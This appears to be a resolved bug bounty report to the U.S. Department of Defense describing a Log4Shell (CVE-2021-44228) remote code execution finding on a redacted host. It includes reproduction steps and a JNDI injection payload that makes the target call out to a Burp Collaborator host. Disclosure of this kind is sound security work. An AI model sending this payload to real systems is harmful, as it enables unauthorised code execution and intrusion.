LOGJ4 VUlnerability [HtUS]
Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
ferreiraklet_
Vulnerability Details
Technical details and impact analysis
**Description:**
Hi team,
log4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable
**Impact**
RCE
**System Host(s)**
██████
**Affected Product(s) and Version(s)**
**CVE Numbers**
CVE-2021-44228
**Steps to Reproduce**
1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
2. paste the poc code on parameter
3. Then burp collaborator received reverse ping back
Photos below
**POC CODE**
${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
**Suggested Mitigation/Remediation Actions**
https://www.lunasec.io/docs/blog/log4j-zero-day/
## Impact
Successful attack leads Arbitary Code Execution on the application
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-44228
UNKNOWN
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Submitted
Weakness
Command Injection - Generic